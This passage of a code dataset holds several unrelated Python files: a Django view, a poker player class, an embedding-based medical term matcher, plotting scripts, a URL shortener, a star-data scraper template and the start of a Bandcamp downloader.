"call"}, {"api_name": "os.path", "line_number": 303, "usage_type": "attribute"}, {"api_name": "zipline.data.bundles.ingest", "line_number": 306, "usage_type": "call"}, {"api_name": "zipline.data.bundles", "line_number": 306, "usage_type": "name"}, {"api_name": "os.environ", "line_number": 306, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp.utcnow", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.Timestamp", "line_number": 306, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 327, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 329, "usage_type": "call"}, {"api_name": "os.path", "line_number": 329, "usage_type": "attribute"}, {"api_name": "pandas.Timestamp", "line_number": 331, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 331, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 332, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 333, "usage_type": "attribute"}]} +{"seq_id": "294144050", "text": "from __future__ import absolute_import, unicode_literals, division, print_function\n\n__author__ = 'reyrodrigues'\n\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext\n\nfrom . import models\nimport json\n\n\ndef index(request):\n shelters = models.Shelter.objects.order_by('occupants')\n serialized = [{\n \"camp_id\": s.camp.id,\n \"type\": s.get_type_display(),\n \"shelter_id\": s.shelter_id,\n \"location\": {\"coordinates\": [s.location.x, s.location.y]}, #json.loads(s.location.json),\n \"occupants\": s.occupants,\n } for s in shelters]\n\n c = models.Camp.objects.get(camp_id=1)\n\n camp = {\n \"name\": c.camp_name,\n }\n\n return render_to_response(\"index.html\", {\n \"shelters\": json.dumps(serialized),\n \"camp\": json.dumps(camp),\n }, RequestContext(request))\n\ndef list(request):\n shelters = models.Shelter.objects.order_by('occupants', 'type', 'shelter_id')\n return render_to_response(\"list.html\", {\n \"shelters\": shelters,\n }, RequestContext(request))\n", "sub_path": "shelters/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.shortcuts.render_to_response", "line_number": 28, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 29, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 30, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 31, "usage_type": "call"}, {"api_name": "django.shortcuts.render_to_response", "line_number": 35, "usage_type": "call"}, {"api_name": "django.template.RequestContext", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "439796982", "text": "from random import randint\nfrom gym import error\nfrom treys import Card\nfrom include import *\n\nclass Player(object):\n\n CHECK = 0\n CALL = 1\n RAISE = 2\n FOLD = 3\n\n total_plrs = 0\n def __init__(self, player_id, stack=2000, emptyplayer=False):\n \n self.player_id = player_id\n self.hand = []\n self.stack = stack\n self.currentbet = 0\n self.lastsidepot = 0\n self._seat = -1\n self.handrank = -1\n # flags for table management\n self.emptyplayer = emptyplayer\n self.betting = False\n self.isallin = False\n self.playing_hand = False\n self.playedthisround = False\n self.sitting_out = True\n self.evaluation_preflop = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.evaluation_flop = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.evaluation_turn = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.evaluation_river = {'hand_strength': '', 'he': '', 'evaluation': 0, 'rc': '', 'score_desc': '', 'player_action': ''}\n self.he = None\n self.round = {'moves_i_made_in_this_round_sofar': '', 'possible_moves': set([]), 'raises_owed_to_me': 0, \"raises_i_owe\": 0}\n self.possible_moves = []\n self.position = player_id \n self.debug_raises = {}\n self.reward = None\n self.action_type = None\n self.regret = {}\n self.raise_possible_tba = False\n self.certainty_to_call = 0\n self.round_track_stack = stack\n self.stack_start_game = stack\n \n\n def get_seat(self):\n return self._seat\n\n def is_possible(self, move):\n move_possible = False\n for item in self.round['possible_moves']:\n if item == move:\n return True\n return move_possible \n\n def count_r(self, my_string, spec=None):\n count_r = 0\n\n if spec is None:\n\n for letter in my_string:\n if letter == 'R' or letter == 'r':\n count_r = count_r + 1\n\n \n else:\n\n for letter in my_string:\n if letter == 'c':\n count_r = count_r + 1\n\n return count_r\n\n\n def set_handrank(self, value):\n self.handrank = value\n\n def populatePlayerPossibleMoves(self, env):\n possible_moves = []\n if(self.count_r(env.last_seq_move) == 3):\n self.round['possible_moves'].clear()\n self.round['possible_moves'].add('c')\n self.round['possible_moves'].add('f')\n \n else:\n self.round['possible_moves'].clear()\n self.round['possible_moves'].add('r')\n self.round['possible_moves'].add('c')\n self.round['possible_moves'].add('f')\n\n def choose_action(self, _round, range_structure, env):\n self.debug_raises.update({_round:env.level_raises})\n if self.round['raises_i_owe'] == 3:\n raise(\"error\")\n betting_threshold = range_structure['betting'][self.round['raises_i_owe']][self.position]\n calling_threshold = range_structure['calling'][self.round['raises_i_owe']][self.position]\n action = None\n using_handstrength = False\n\n if range_structure == preflop_range:\n eval_cards = self.evaluation_preflop[\"evaluation\"]\n \n else:\n eval_cards = self.he.hand_strength\n using_handstrength = True\n\n decide_boundaries = self.compare_eval_threshold(eval_cards, [betting_threshold, calling_threshold])\n\n self.raise_possible_tba = self.is_possible('r')\n # Now, for distributing rewards later we need to know how the probability that our villain will stay in the hand given that he faces another raise:\n # The reason for checking that here is that, with the artifical agent, we get certainties about his actions.\n check_next = self.round['raises_i_owe'] + 1\n if check_next < 3:\n \n potential_calling_threshold = range_structure['calling'][check_next][self.position] # Tells you how strong villains next hand must be\n \n if using_handstrength:\n self.certainty_to_call = 1 if eval_cards > potential_calling_threshold else 0 \n else:\n \n self.certainty_to_call = 1 if eval_cards < potential_calling_threshold else 0 \n\n if (decide_boundaries == betting_threshold) and self.is_possible('r'):\n # total_bet = env._tocall + env._bigblind - self.currentbet if _round == 'Preflop' else 25\n total_bet = None\n if _round == 'Preflop' and self.position == 0:\n \n total_bet = 40\n else:\n total_bet = 25\n\n action = (2, total_bet)\n assert action[1] == 40 or action[1] == 25\n elif (decide_boundaries == calling_threshold or decide_boundaries == betting_threshold) and self.is_possible('c'):\n action = [(1, 0), (0, 0)] # or 0\n else:\n action = (3, 0)\n\n return action\n\n def set_seat(self, value):\n self._seat = value\n\n \n def compare_eval_threshold(self, a, list_ev):\n ans = -1\n for b in list_ev:\n st = (a>b)-(a= 1:\n return b\n else:\n continue\n else: # Standard Evaluation (Pre-Flop)\n if st >= 1:\n continue\n else:\n return b\n\n return -1\n\n def reset_hand(self):\n self._hand = []\n self.playedthisround = False\n self.betting = False\n self.isallin = False\n self.currentbet = 0\n self.lastsidepot = 0\n self.playing_hand = (self.stack != 0)\n\n def bet(self, bet_size):\n self.playedthisround = True\n if not bet_size:\n return\n self.stack -= (bet_size - self.currentbet) # Total - 10 in case of SB calling to see flop\n self.currentbet = bet_size\n if self.stack == 0:\n self.isallin = True\n\n def refund(self, ammount):\n self.stack += ammount\n\n def player_state(self):\n return (self.get_seat(), self.stack, self.playing_hand, self.betting, self.player_id)\n\n def reset_stack(self):\n self.stack = 2000\n\n def update_localstate(self, table_state):\n self.stack = table_state.get('stack')\n self.hand = table_state.get('pocket_cards')\n\n # cleanup\n def player_move(self, table_state, action, last_seq_move=None, _round=None):\n self.update_localstate(table_state)\n bigblind = table_state.get('bigblind')\n tocall = min(table_state.get('tocall', 0), self.stack)\n minraise = 0 #table_state.get('minraise', 0) - 10\n [action_idx, raise_amount] = action\n raise_amount = int(raise_amount) \n action_idx = int(action_idx)\n if action[0] == 2:\n if _round == 0:\n if self.position == 0 and self.count_r(last_seq_move) == 0:\n action[1] = 40\n elif self.position == 2:\n action[1] = 50 if self.count_r(last_seq_move) > 0 else 25\n if self.get_seat() == 2 and self.count_r(last_seq_move) > 0:\n action[1] = 50 if self.count_r(last_seq_move) > 1 else 25\n else:\n \n action[1] = 50 if self.count_r(last_seq_move) > 0 else 25\n \n if (self.count_r(last_seq_move)) > 1 or _round != 0:\n \n to_call = 25 * (self.count_r(last_seq_move)) \n\n [action_idx, raise_amount] = action\n raise_amount = int(raise_amount) \n action_idx = int(action_idx)\n\n if tocall == 0:\n # if not(action_idx in [Player.CHECK, Player.RAISE]):\n # print(\"watch\")\n assert action_idx in [Player.CHECK, Player.RAISE]\n if action_idx == Player.RAISE:\n if raise_amount < minraise:\n raise error.Error('raise must be greater than minraise {}'.format(minraise))\n if raise_amount > self.stack:\n raise_amount = self.stack\n move_tuple = ('raise', raise_amount)\n elif action_idx == Player.CHECK:\n move_tuple = ('check', 0)\n else:\n raise error.Error('invalid action ({}) must be check (0) or raise (2)'.format(action_idx))\n else:\n if action_idx not in [Player.RAISE, Player.CALL, Player.FOLD]:\n raise error.Error('invalid action ({}) must be raise (2), call (1), or fold (3)'.format(action_idx))\n if action_idx == Player.RAISE:\n if raise_amount < minraise:\n raise error.Error('raise must be greater than minraise {}'.format(minraise))\n if raise_amount > self.stack:\n raise_amount = self.stack\n move_tuple = ('raise', raise_amount)\n elif action_idx == Player.CALL:\n move_tuple = ('call', tocall)\n elif action_idx == Player.FOLD:\n move_tuple = ('fold', -1)\n else:\n raise error.Error('invalid action ({}) must be raise (2), call (1), or fold (3)'.format(action_idx))\n return move_tuple\n", "sub_path": "main_files/holdem/holdem/player.py", "file_name": "player.py", "file_ext": "py", "file_size_in_byte": 8489, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "gym.error.Error", "line_number": 230, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 230, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 237, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 237, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 240, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 240, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 243, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 243, "usage_type": "name"}, {"api_name": "gym.error.Error", "line_number": 252, "usage_type": "call"}, {"api_name": "gym.error", "line_number": 252, "usage_type": "name"}]} +{"seq_id": "649226955", "text": "# -*- coding: utf8 -*-\n \nimport json\nimport numpy as np\nimport os\nfrom gensim.models.wrappers import FastText\nfrom tqdm import tqdm\nimport sys\nfrom sklearn.metrics import classification_report, precision_recall_fscore_support\nimport json\nimport re\nimport gensim\nfrom pymorphy2 import MorphAnalyzer\nfrom sklearn.metrics import classification_report, precision_recall_fscore_support\nfrom sklearn.metrics import precision_score\n\nmorph = MorphAnalyzer()\n\ndef cosine(u, v):\n return np.dot(u, v)/(np.linalg.norm(u)*np.linalg.norm(v))\n\t\n\nFT_PATH = '/bigdisk/Mihail/'\nprint('Initializing FastText model')\nfasttext_model = os.path.join(FT_PATH, 'cc.en.300')\nft_model = FastText.load_fasttext_format(fasttext_model)\n\n\n# ft_model= gensim.models.FastText.load_fasttext_format('/bigdisk/Mihail/ft_native_300_ru_wiki_lenta_lemmatize', binary=False)\n# ft_model.save_word2vec_format('/bigdisk/Mihail/ft_native_300_ru_wiki_lenta_lemmatize'+\".bin\", binary=True)\n# ft_model = gensim.models.FastText.load_fasttext_format('/bigdisk/Mihail/ft_native_300_ru_wiki_lenta_lemmatize'+\".bin\", binary=True)\n\nprint(\"llt from Meddra in FastText\")\nmeddra_model = []\nid_words = []\nwith open(\"llt.asc\", \"r\") as f:\n\tlltLines = f.readlines()\n\tlltLines = [x.split('$') for x in lltLines ]\n\tfor line in tqdm(lltLines):\n\t\ttry:\n\t\t\tel_model_vec = ft_model[line[1]]\n\t\t\tmeddra_model.append(el_model_vec)\n\t\t\tid_words.append(line[2])\n\t\texcept:\n\t\t\tpass\n\n\n# def GetPhrase_pt(probablyPT):\n\t# pt_id = None\n\t# for line in lltLines:\n\t\t# if probablyPT == line[1]:\n\t\t\t# pt_id = line[2]\n\t\t\t# break\n\t# else:\n\t\t# pt_id = \"CONCEPT_LESS\"\n\t# return pt_id\n\n\t# raise ValueError(\"PT not found in pt.asc\", [probablyPT])\n\t\ndef GetPtId(probablyPT):\n\tif probablyPT == 'CONCEPT_LESS':\n\t\treturn 'CONCEPT_LESS'\n\tfor i, line in enumerate(lltLines ):\n\t\t#if line.strip() == \"\":\n\t\t\t#raise ValueError(\"Empty string #\",i)\n\t\tif probablyPT == line[0]:\n\t\t\treturn line[2] \n\t\telif probablyPT == line[2]:\n\t\t\treturn probablyPT\n\t\n\nprint(\"phrase from Cadec in FastText\")\npath = \"/bigdisk/Mihail/meddra/\"\ncadec_model = []\ny_true, y_pred = [], []\nmax_vector = []\nfor i_file, fileName in tqdm(enumerate(os.listdir(path))):\n\tif i_file % 50 == 0:\n\t\tprint(\"files processed:\", i_file)\n\twith open(path+\"/\"+fileName, \"r\") as f:\n\t\tfor i_line, line in enumerate(f):\n\t\t\tid_counter = 0\n\t\t\tline = re.sub(\" {3,}\", \"\\t\", line)\n\t\t\tline = line.split(\"\\t\")\n\t\t\tphrase = line[-1]\n\t\t\tnorm_phrase = list()\n\t\t\tphrase = phrase.replace('\\\\', '')\n\t\t\tphrase = phrase.replace('\\n', '')\n\t\t\tphrase = phrase.replace(\"'\", '')\n\t\t\tphrase = phrase.replace('\"', '')\n\t\t\tphrase = phrase.strip(\"\\t\")\n\t\t\twords = phrase.split(' ')\n\t\t\tfor word in words:\n\t\t\t\tword = word.replace(',', '')\n\t\t\t\ttry:\n\t\t\t\t\tparsResult = morph.parse(word)[0]\n\t\t\t\t\tlemma = parsResult.normal_form.upper()\n\t\t\t\t\tnorm_phrase.append(lemma.lower())\n\t\t\t\texcept:\n\t\t\t\t\tnorm_phrase.append(word.lower())\n\t\t\tif len(norm_phrase) > 1:\n\t\t\t\tnorm_phrase = ' '.join(norm_phrase)\n\t\t\t\ttry:\n\t\t\t\t\telemCadec = ft_model[norm_phrase]\n\t\t\t\t\t# print(norm_phrase)\n\t\t\t\t\t# Nvector = []\n\t\t\t\t\t# norm_phrase = re.sub(\"\\d\", \"\", norm_phrase)\n\t\t\t\t\t# norm_phrase = re.sub(\"/\", \"\", norm_phrase)\n\t\t\t\t\t# norm_phrase = norm_phrase.split()\n\t\t\t\t\t# for Nphrase in norm_phrase:\n\t\t\t\t\t\t# Nvector.append(ft_model[Nphrase])\n\t\t\t\t\t# elemCadec = np.mean(Nvector)\n\t\t\t\t\t# np.transpose(elemCadec)\n\t\t\t\t\t# elemCadec = elemCadec[1:300]\n\t\t\t\t\t# print(elemCadec)\n\t\t\t\t\t# print(fileName)\n\t\t\t\t\t# print(norm_phrase)\n\t\t\t\t\tif \"/\" in line[1]:\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split(\"/\")[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split('/')[1].split()[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\telif \"+\" in line[1]:\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split()[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split()[2])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tpt_true = GetPtId(line[1].split()[0])\n\t\t\t\t\t\ty_true.append(pt_true)\n\t\t\t\t\t\tid_counter += 1\n\t\t\t\t\tmax_sim = -100\n\t\t\t\t\tid_max_sim = ''\n\t\t\t\t\tfor i_id, elemMeddra in zip(id_words, meddra_model):\n\t\t\t\t\t\tsim = cosine(elemCadec, elemMeddra)\n\t\t\t\t\t\tif sim > max_sim:\n\t\t\t\t\t\t\tmax_sim = sim\n\t\t\t\t\t\t\tid_max_sim = i_id\n\t\t\t\t\ty_pred.append(id_max_sim)\n\t\t\t\t\tif id_counter == 2:\n\t\t\t\t\t\ty_pred.append(id_max_sim)\n\t\t\t\t\tif len(y_true) > len(y_pred):\n\t\t\t\t\t\tprint(fileName)\n\t\t\t\texcept:\n\t\t\t\t\tpass\n\t\t\t# break\n\t\t\t# print(y_true)\n\t\t\t# print(y_pred)\n\t\t\t# break\n\t\t\t\t\t\n\n\t\n\t\"\"\"\n\tэто точность для терминов кадека из нескольких слов(больше 2) с векторами,\n\tполученными просто подавая всю сущность в модель FT.\n\t\n\t\"\"\"\n\t\nreport = classification_report(y_true, y_pred, output_dict = True)\nprint('macro avg', report['macro avg'])\nprint('weighted avg', report['weighted avg'])\nprint('accuracy', report['accuracy'])\n\n\n\n\n\n", "sub_path": "test_FastText_Cadec1.py", "file_name": "test_FastText_Cadec1.py", "file_ext": "py", "file_size_in_byte": 4845, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "pymorphy2.MorphAnalyzer", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.dot", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.linalg.norm", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.linalg", "line_number": 20, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "gensim.models.wrappers.FastText.load_fasttext_format", "line_number": 26, "usage_type": "call"}, {"api_name": "gensim.models.wrappers.FastText", "line_number": 26, "usage_type": "name"}, {"api_name": "tqdm.tqdm", "line_number": 39, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 77, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 77, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 163, "usage_type": "call"}]} +{"seq_id": "126482989", "text": "from numpy import *\nfrom matplotlib.pyplot import *\nfrom scipy.optimize import curve_fit\nimport os\n\ndef readFileTwoColoumns(inpFile):\n infile = open(inpFile,\"r\")\n first = []\n second = []\n for line in infile:\n split = line.split()\n first.append(float(split[0]))\n second.append(float(split[1]))\n return first,second\n\ndef readFileThreeColoumns(inpFile):\n infile = open(inpFile,\"r\")\n first = []\n second = []\n third = []\n for line in infile:\n split = line.split()\n first.append(float(split[0]))\n second.append(float(split[1]))\n third.append(float(split[2]))\n return first,second,third\n\ndef plot_data():\n\n #make path to store figures and fecht data\n main_path = os.getcwd()\n data_path = os.path.normpath(main_path+os.sep+os.pardir+\"\\Data\")\n figure_path = os.path.normpath(main_path+os.sep+os.pardir+\"\\Figures\")\n try:\n os.mkdir(figure_path)\n except OSError:\n print (\"Creation of the directory %s failed. It may already exist.\" % figure_path)\n else:\n print (\"Successfully created the directory %s \" % figure_path)\n\n #Three lowest states in single electron system\n rho0_single0,psi0_single = readFileTwoColoumns(data_path+\"\\E_0.dat\")\n rho1_single1,psi1_single = readFileTwoColoumns(data_path+\"\\E_1.dat\")\n rho2_single2,psi2_single = readFileTwoColoumns(data_path+\"\\E_2.dat\")\n\n plot(rho0_single0,psi0_single)\n title(\"GS, single electron\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n savefig(figure_path+\"\\E_0.png\")\n print(\"Saved: E_0.png\")\n clf()\n\n plot(rho1_single1,psi1_single)\n title(\"1st exited state, single electron\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n savefig(figure_path+\"\\E_1.png\")\n print(\"Saved: E_1.png\")\n clf()\n\n plot(rho2_single2,psi2_single)\n title(\"2nd exited state, single electron\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n savefig(figure_path+\"\\E_2.png\")\n print(\"Saved: E_2.png\")\n clf()\n\n #Lowest state in two-electron system without potential and 4 different frequencies\n rho0_double_001, psi_001 = readFileTwoColoumns(data_path+\"\\E_GS_0_0_1_No_Interaction.dat\")\n rho0_double_05, psi_05 = readFileTwoColoumns(data_path+\"\\E_GS_0_5_No_Interaction.dat\")\n rho0_double_1, psi_1 = readFileTwoColoumns(data_path+\"\\E_GS_1_No_Interaction.dat\")\n rho0_double_5, psi_5 = readFileTwoColoumns(data_path+\"\\E_GS_5_No_Interaction.dat\")\n\n plot(rho0_double_001,psi_001, label = \"$\\\\omega_{r} = 0.01$\")\n plot(rho0_double_05,psi_05, label = \"$\\\\omega_{r} = 0.5$\")\n plot(rho0_double_1,psi_1, label = \"$\\\\omega_{r} = 1$\")\n plot(rho0_double_5,psi_5, label = \"$\\\\omega_{r} = 5$\")\n title(\"GS, two electrons, varying HO-frequency, no interaction.\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n legend()\n savefig(figure_path+\"\\E_GS_No_Interaction.png\")\n print(\"Saved: E_GS_No_Interaction.png\")\n clf()\n\n\n #Lowest state in two-electron system with potential and 4 different frequencies\n rho0_double_001_int, psi_001_int = readFileTwoColoumns(data_path+\"\\E_GS_0_0_1_With_Interaction.dat\")\n rho0_double_05_int, psi_05_int = readFileTwoColoumns(data_path+\"\\E_GS_0_5_With_Interaction.dat\")\n rho0_double_1_int, psi_1_int = readFileTwoColoumns(data_path+\"\\E_GS_1_With_Interaction.dat\")\n rho0_double_5_int, psi_5_int = readFileTwoColoumns(data_path+\"\\E_GS_5_With_Interaction.dat\")\n\n plot(rho0_double_001_int,psi_001_int, label = \"$\\\\omega_{r} = 0.01$\")\n plot(rho0_double_05_int,psi_05_int, label = \"$\\\\omega_{r} = 0.5$\")\n plot(rho0_double_1_int,psi_1_int, label = \"$\\\\omega_{r} = 1$\")\n plot(rho0_double_5_int,psi_5_int, label = \"$\\\\omega_{r} = 5$\")\n title(\"GS, two electrons, varying HO-frequency, with interaction.\")\n xlabel(r\"$\\rho$\")\n ylabel(\"$|\\psi(\\\\rho)|^{2}$\")\n legend()\n savefig(figure_path+\"\\E_GS_With_Interaction.png\")\n print(\"Saved: E_GS_With_Interaction.png\")\n clf()\n\n #Number of iterations as function of steps and value of eigenvalue approximation as function of steps\n n_step, n_iter, lamda = readFileThreeColoumns(data_path+\"\\iterations_transformations_eigenvalues_rho_max_3.dat\")\n\n def func(x,a,b):\n return a*x**2 + b\n\n plot(n_step,n_iter, label=\"$\\\\rho_{max} = 3.0$\")\n popt, pcov = curve_fit(func,array(n_step),array(n_iter))\n #plot(n_step,func(array(n_step),*popt), linestyle = \"--\", label =\"Optimixed curve: y = $%.2fx^{2} + %.2f$\"% tuple(popt))\n print(\"Optimized curve: y = %.2fx**2 %.2f\"% tuple(popt))\n title(\"Number of transformations as function of integration points n.\")\n xlabel(\"n\")\n ylabel(\"Number of orthogonal transformations\")\n legend()\n savefig(figure_path+\"\\\\Number_Of_Transformations.png\")\n print(\"Saved: Number_Of_Transformations.png\")\n clf()\n\n #Eigenvalue approximation as function of steps n\n plot(n_step,lamda, label=\"$\\\\rho_{max} = 3.0$\")\n title(\"Eigenvalue approximation of GS as function of integration points n.\")\n xlabel(\"n\")\n ylabel(\"Eigenvalue approximation\")\n legend()\n savefig(figure_path+\"\\Eigenvalues_Approx.png\")\n print(\"Saved: Eigenvalues_Approx.png\")\n clf()\n", "sub_path": "Project2/Python/fys3150_project2_plot_data.py", "file_name": "fys3150_project2_plot_data.py", "file_ext": "py", "file_size_in_byte": 5191, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "os.getcwd", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.normpath", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.sep", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.pardir", "line_number": 33, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 35, "usage_type": "call"}, {"api_name": "scipy.optimize.curve_fit", "line_number": 114, "usage_type": "call"}]} +{"seq_id": "24969085", "text": "import base64\nimport hashlib\nimport logging\n\nimport validators\n\n\nclass URLShortener():\n \"\"\"Shorten the URL.\"\"\"\n length = 5\n\n def __init__(self, length):\n self.init_log()\n\n def short(self, url):\n \"\"\"Hash the URL by md5 and base64, return shorter characters.\"\"\"\n if validators.url(url):\n sha = hashlib.md5(url.encode('utf-8')).digest()\n altchars = '-_'.encode('utf-8')\n sha_base64 = base64.b64encode(sha, altchars).decode('utf-8')\n\n logging.info('URL: %s ===> %s', url, sha_base64[:self.length])\n return sha_base64[:self.length]\n else:\n logging.info('ValidationFailure. ===> %s', url)\n return None\n\n def init_log(self):\n \"\"\"Init the logger.\"\"\"\n FORMAT = '%(asctime)-20s %(levelname)-9s %(message)s'\n DATEFORMAT = '%Y-%m-%d %H:%M:%S'\n handler = logging.FileHandler('log.log', mode='a', encoding='utf-8')\n logging.basicConfig(handlers=[handler],\n format=FORMAT,\n datefmt=DATEFORMAT,\n level=logging.INFO)\n\n console = logging.StreamHandler()\n console.setLevel(logging.INFO)\n console.setFormatter(logging.Formatter(fmt=FORMAT, datefmt=DATEFORMAT))\n logging.getLogger().addHandler(console)\n", "sub_path": "short_url_generator.py", "file_name": "short_url_generator.py", "file_ext": "py", "file_size_in_byte": 1346, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "validators.url", "line_number": 17, "usage_type": "call"}, {"api_name": "hashlib.md5", "line_number": 18, "usage_type": "call"}, {"api_name": "base64.b64encode", "line_number": 20, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 22, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 25, "usage_type": "call"}, {"api_name": "logging.FileHandler", "line_number": 32, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 33, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 36, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 38, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 39, "usage_type": "attribute"}, {"api_name": "logging.Formatter", "line_number": 40, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 41, "usage_type": "call"}]} +{"seq_id": "597135429", "text": "import json \n\ndata = '''\n{\n \"name\":\"Banner\",\n \"phone\":\"Classified\",\n \"id\" : \"Classified\",\n \"intercom\" :{\n \"type\": \"intl\",\n \"value\":\"99392933\"\n },\n\n \"email\" :{\n \"hide\":\"True\"\n }\n}\n'''\n\ninfo = json.loads(data)\nprint('Name:',info[\"name\"])\nprint('ID:',info[\"id\"])\nprint('Intercom:',info[\"intercom\"][\"value\"])\nprint('E-Mail:',info[\"email\"][\"hide\"])\nprint(\"Phone:\",info[\"phone\"])\n\n", "sub_path": "agent.py", "file_name": "agent.py", "file_ext": "py", "file_size_in_byte": 391, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "json.loads", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "422638915", "text": "\r\nfrom bs4 import BeautifulSoup as bs\r\nimport requests\r\nimport pandas as pd\r\n\r\n# put the url from the PDF\r\n#bright_stars_url = \r\n\r\npage = requests.get(bright_stars_url)\r\n#print(page)\r\n\r\nsoup = bs(page.text,'html.parser')\r\n# use soup.find() by passing 'table' as parameter and assign to variable star_table\r\n\r\n# take an empty list vaiable called temp_list\r\n\r\n#use star_table.find_all('tr') and assign to table_rows\r\n\r\nfor tr in table_rows:\r\n td = tr.find_all('td')\r\n row = [i.text.rstrip() for i in td]\r\n temp_list.append(row)\r\n\r\n\r\n\r\nStar_names = []\r\nDistance =[]\r\nMass = []\r\nRadius =[]\r\nLum = []\r\n\r\nfor i in range(1,len(temp_list)):\r\n Star_names.append(temp_list[i][1])\r\n Distance.append(temp_list[i][3])\r\n Mass.append(temp_list[i][5])\r\n Radius.append(temp_list[i][6])\r\n Lum.append(temp_list[i][7])\r\n \r\ndf2 = pd.DataFrame(list(zip(Star_names,Distance,Mass,Radius,Lum)),columns=['Star_name','Distance','Mass','Radius','Luminosity'])\r\nprint(df2)\r\n\r\n#use df2.to_csv and pass a file name \r\n", "sub_path": "data_scraping_1.py", "file_name": "data_scraping_1.py", "file_ext": "py", "file_size_in_byte": 1013, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "requests.get", "line_number": 9, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "582421051", "text": "#Code by: Krazoa\n#Bandcamp Spider: v0.1\n\nimport shutil\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\nimport requests\nfrom lxml import etree\nimport urllib.request\nimport re\nimport time\n\n#get target album URL**\nalbumURL = input(\"Enter target album URL: \")\nvalidationCondition = 0\n#get download destination file address (where track will be downloaded to\nwhile validationCondition == 0:\n downloadDestination = input(\"Enter URL of download destination on your computer: \")\n #check download destination and verify its existance\n downloadConfirm = input(\"Are you sure this is your download directory? This cannot be changed. Please type [confirm] or press enter to cancel: \").upper()\n if downloadConfirm == \"CONFIRM\":\n directoryValidation = os.path.exists(downloadDestination)\n if directoryValidation == False:\n print(\"Invalid directory. Check your input directory and try again\")\n else:\n print(\"Directory successfully validated\")\n 